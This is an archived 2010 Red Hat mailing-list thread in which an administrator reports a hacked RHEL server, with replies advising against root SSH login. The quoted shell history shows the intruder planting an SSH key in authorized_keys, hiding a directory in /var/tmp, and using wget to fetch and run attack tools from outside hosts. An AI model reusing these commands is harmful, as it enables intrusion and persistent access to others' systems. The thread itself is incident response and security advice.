Agreed. Also, Never allow root login via ssh. Always keep th os up to date with at least security patches. This should not be news to this audience. ----- Original Message ----- From: redhat-list-bounces@xxxxxxxxxx <redhat-list-bounces@xxxxxxxxxx> To: General Red Hat Linux discussion list <redhat-list@xxxxxxxxxx> Sent: Thu Jan 28 08:11:44 2010 Subject: Re: help Brute force attacks. Leaving root ssh open to the world us begging to be owned like this. Always turn that off or use key only auth for root on Internet facing boxes. Sent from my iPhone On Jan 28, 2010, at 0:33, "Joy Methew" <ml4joy@xxxxxxxxx> wrote: > still i m thinking how he/she got my password?? > > > On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy@xxxxxxxxx> wrote: > >> i have changed my root password >> >> >> On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan <Wahyu.Darmawan@xxxxxxxxx >>> wrote: >> >>> You may change your root password first, and then you can continue >>> to >>> analyze your system. >>> >>> ________________________________________ >>> From: redhat-list-bounces@xxxxxxxxxx [redhat-list- >>> bounces@xxxxxxxxxx] On >>> Behalf Of Joy Methew [ml4joy@xxxxxxxxx] >>> Sent: Thursday, January 28, 2010 12:59 PM >>> To: General Red Hat Linux discussion list >>> Subject: help >>> >>> Hello all, >>> i m using RHEL5.3 as a my mail server with real >>> ip.i >>> configure my system mostly remotely.last login time of my system >>> 27 jan >>> from this ip 118.129.153.43. >>> than i try to login at 28 jan in morning so i can`t got >>> authentication as >>> root from my last password. >>> than i reboot the system reset my password. >>> i login as a root than i run "last" command i m sending tha first >>> 10 lines >>> of last command...i thinks someone hack my system.i am sending >>> history >>> command output. >>> now i remove .ssh directory and /var/tmp/* >>> >>> please suggest wat is this?? >>> >>> thanks >>> >>> last command out put: >>> root pts/1 117.199.118.234 Thu Jan 28 10:58 still >>> logged in >>> root pts/0 117.199.118.234 Thu Jan 28 10:49 still >>> logged in >>> root tty1 Thu Jan 28 10:48 - 10:52 >>> (00:04) >>> reboot system boot 2.6.18-128.el5PA Thu Jan 28 10:45 >>> (00:25) >>> root pts/2 165.red-79-153-1 Thu Jan 28 01:42 - 01:52 >>> (00:09) >>> root pts/2 165.red-79-153-1 Wed Jan 27 23:02 - 01:27 >>> (02:25) >>> root pts/2 165.red-79-153-1 Wed Jan 27 22:33 - 22:34 >>> (00:00) >>> root pts/3 165.red-79-153-1 Wed Jan 27 22:32 - 22:33 >>> (00:00) >>> root pts/2 118.129.153.43 Wed Jan 27 22:31 - 22:32 >>> (00:01) >>> root pts/2 117.199.114.189 Wed Jan 27 15:47 - 15:51 >>> (00:03) >>> >>> What is 165.red-79........this is nt my ip. >>> >>> >>> History Output >>> >>> 115 cat /proc/cpuinfo >>> 116 mkdir .ssh >>> 117 cd .ssh >>> 118 echo ssh-rsa >>> >>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH >>> +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ >>> +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf >>> +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== >>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; >>> chmod 600 >>> ~/.ssh/authorized_keys >>> 119 cd /var/tmp >>> 120 mkdir " " >>> 121 cd " " >>> 122 passwd >>> 123 echo ssh-rsa >>> >>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH >>> +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ >>> +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf >>> +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== >>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; >>> chmod 600 >>> ~/.ssh/authorized_keys >>> 124 ps -x >>> 125 cd /var/tmp >>> 126 w >>> 127 wget http://kok.ucoz.de/gosh.tgz >>> 128 tar xvf gosh.tgz >>> 129 cd gosh >>> 130 chmod +x * >>> 131 ./go.sh 121 >>> 132 w >>> 133 ps -x >>> 134 ps -aux >>> 135 cd /var/tmp >>> 136 cd " " >>> 137 ls -a >>> 138 wget http://helpbnc.myftp.org/danger/fld.tgz >>> 139 tar xzvf fld.tgz >>> 140 cd fld >>> 141 chmod +x * >>> 142 nano cyc.acc >>> 143 nano cyc.acc.1 >>> 144 nano cyc.set >>> 145 ./httpd >>> 146 w >>> -- >>> redhat-list mailing list >>> unsubscribe mailto:redhat-list-request@xxxxxxxxxx? >>> subject=unsubscribe >>> https://www.redhat.com/mailman/listinfo/redhat-list >>> >>> -- >>> redhat-list mailing list >>> unsubscribe mailto:redhat-list-request@xxxxxxxxxx? >>> subject=unsubscribe >>> https://www.redhat.com/mailman/listinfo/redhat-list >>> >> >> > -- > redhat-list mailing list > unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe > https://www.redhat.com/mailman/listinfo/redhat-list -- redhat-list mailing list unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe https://www.redhat.com/mailman/listinfo/redhat-list -- redhat-list mailing list unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe https://www.redhat.com/mailman/listinfo/redhat-list
